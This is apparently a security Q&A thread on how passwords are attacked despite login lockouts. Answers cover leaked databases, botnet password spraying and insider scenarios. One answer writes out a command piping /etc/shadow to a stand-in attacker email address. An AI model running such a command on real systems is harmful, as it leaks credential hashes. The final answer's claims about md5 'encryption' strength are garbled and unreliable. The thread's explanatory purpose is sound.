10

I understand from a cryptographic standpoint that you want a password to be as random as possible to resist brute force or dictionary attacks. That is fine- but in what circumstances can those approaches actually be taken? Just about every system I have ever had a password to locks you out if you enter more than a couple incorrect guesses. We're looking at millions of guesses even for very weak passwords, which seems to be impossible on these types of systems.

How do people go about attacking passwords other than by social engineering?

Paul Becotte
  • 202
  • 1
  • 6

4 Answers4

14

Analysis of the 32 million passwords recently exposed in the breach of social media application developer RockYou last month provides further proof that consumers routinely use easy to guess login credentials. Sensitive login credentials - stored in plain text - were left exposed because of a SQL injection bug in RockYou's website.

The emails and passwords of around 1.3 million registered users – including those of Gawker Media owner Nick Denton and its employees – were accessed and subsequently published online.

The social networking website LinkedIn was hacked on 5 June 2012, and passwords for nearly 6.5 million user accounts were stolen

A hacker collective calling itself D33Ds Co. publicly posted more than 450,000 log-in credentials -- i.e., paired usernames and passwords -- obtained from Yahoo's "Contributor Network" site.

It all started when Adobe reported the breach of more than 3 million customers' information (including password-identifying information), then upped the number to 38 million. Last week it got a whole lot worse when an outside company found the data of some 152 million Adobe customers on a site frequented by cybercriminals.

Turkish hacker Maxn3y defaced avadas.de on Saturday (archive here) before dumping what the hacker claimed were customer details online. The purportedly leaked information included incomplete configuration files for the shop.avadas.de domain, what appeared to be authentic admin login details with encrypted passwords, and (most seriously), what security experts believe is the PayPal payment information for an estimated 20,000 consumers. According to Cyberwarnews.info, which analysed the data dump, the hackers also grabbed the email addresses, user names, encrypted passwords as well as certain bank and payment details of the customers.

Thousands of Tesco customers have had their emails and passwords posted online after hackers got their hands on the login details.

Relying on the rate limit on password attacks is all good and well until the password database gets leaked.

When the password database is in cleartext, the game is over for this password. You can't mitigate that by having a strong password, only by not reusing the same password (or an easy-to-modify password such as swordfish!Yahoo vs swordfish!Tesco) on different sites.

When the password database is hashed, it takes some time for attackers to run an offline search and find the passwords. The stronger the password and the better the hash, the longer the attacker will need. If your password is strong enough, then you may have a chance to change your password before any attacker finds your password. This puts users in competition: the weakest passwords will be the first to be exploited. Even in this case, you'll need to change the password everywhere you use it, which strongly argues in favor of genuinely site-unique passwords.

Community
  • 1
Gilles 'SO- stop being evil'
  • 50,912
  • 13
  • 120
  • 179
  • 2
    Plaintext leaks are always "Game Over, Dude!". For putting "weak" passwords into perspective, take a look at [Hashcat's speeds](http://hashcat.net/oclhashcat/) to see how quickly an attacker can work. For instance, take the horrifically bad case of single MD5; a single attacker with "PC5 (8x AMD R9 290Xstock core clock)" can attempt 81.549 billion tries per second. That's over 2.11E17 (over 2^57) tries per 30 day month. – Anti-weakpasswords Feb 22 '14 at 02:24
5

Let's assume you have a botnet that can distribute login attempts across many unique client IPs (enough that it's not easy for someone to simply firewall you), and you want to use your botnet to guess correct logins on popularwebsite.com by brute force. Let's also assume that popularwebsite.com locks a user account after 5 wrong login attempts in a row.

No problem. Crank up your botnet and throw 1000 login attempts per second at it, from a widely dispersed set of source IPs. Each login attempt uses one of the most common passwords (123456, password, etc) and tries to guess a user account with that password. (Should be easy if they have an e-mail address database to get ideas from.) Does popularwebsite.com stop accepting all login attempts with that password if you don't guess the right user fast enough? I doubt it!

So what are our prospects here? First let's make some assumptions:

  • 20% of the user account names that we guess actually exist (factors affecting this would include gross number of accounts, correlation between user account and email address, quality of our email database)
  • 4.7% of users use password as their password

This would mean that if we just try password as the password every time, the probability of a single individual guessed login being right is:

47 / (1000 * 5) = 0.94%

So if we're 20% effective at guessing actual user accounts, then we get a hit about every 106 attempts doing this, or about 10 successes per second using our imagined botnet. This is without any server-side compromise or exploit, just guessing logins. And if our botnet runs on the home PCs of the users, the only way the target can stop the attack is to force 4.7% of their users to change their password, which would chase some of them away and we just start again with 123456.

But if people use passwords that no one else uses, it's nowhere near as easy to make this attack pay off.

wberry
  • 624
  • 3
  • 6
  • +1 from me. This is the best answer. The other answers' focus on database compromise miss the main issue. – paj28 Feb 23 '14 at 08:39
4

People with malicious intentions could go about stealing sensitive information (i.e. passwords) via the following methods.

  • Host intrusion

Example: The malicious hacker takes up employment for the attacked company as a developer on a 3-month contract and is given a shell account on a server with limited privileges and I ask the system administrator to check for an unknown problem that hinders my work. I managed to persuade him/her to give me root privileges to a shell script written by me on for five minutes, as it helps to customize to work environment and greatly speeds up my project. As he is busy with other things and has a meeting in ten minutes, he gives me root privileges to my custom script for 10 minutes. I have set up a trap, the malicious script is run with root privileges, which emails the /etc/shadow file to my company email account. A few weeks later after I will have granted my VPN access, I will VPN in from my home machine and I will get a copy/paste from my company email to my home desktop. I obtained the password hashes.

  • Unauthorised physical access to workstations

Example: A malicious hacker takes up employment as a cleaner for the cleaning business who subcontracts for the company is being attacked. He is authorised access to the premises of the IT department, including the system administrator or chief developers' desk. He looks for passwords or sensitive information on post-it notes, or tries to find unlocked workstations etc. Sooner or later he'll find one. Imagine the open terminal of the system administrator who accidentally left his shell terminal open after he had left for home in a rush. Of course, the sudo privileges with root access is still open as he had forgotten to lock his workstation...while he is cleaning up his desk, brushing off dust from his keyboard, looks around, no-one is watching, the whole office is empty, everyone had gone home for the day. He quickly types cat /etc/shadow | mail hacker@anonymous.net and he obtains the password hashes.

  • XSS attack

Example: against a poorly protected web server a malicious hacker manages to run a XSS script, where the code injection runs a command which mails him the file called /root/my.cnf which the system administrator had forgotten to remove ever since the web server with MySQL had been set up. He had thought that his HOME directory was safe anyway, so he thought removing files including passwords from root's HOME was not a high priority. The MySQL password happens to be the same as the root password on that machine. With the root password, it's no mean feat to obtain other sensitive information for other more protected servers' passwords.

The above methods are I believe not social engineering. Hope this helps to widen your imagination :)

miklosq
  • 41
  • 3
0

I looks like your confusing various layers of security . the encryption of a file is the one level of security which could be md5 encyption , which would be a type of encyption. then you have encyrption strength associated to the md5- 2048 would be military grade. the other layer of security is your password strength, the more complex the better. now if you looking to attach a password, you have to ask what is the reason, and is the password really what is needed to asses the vulnerability of a system or can you find a work around.

  • if you looking to use the best possible method then go your hands on a quantum computer.jk.

Rick

Ricardo Postigo
  • 41
  • 1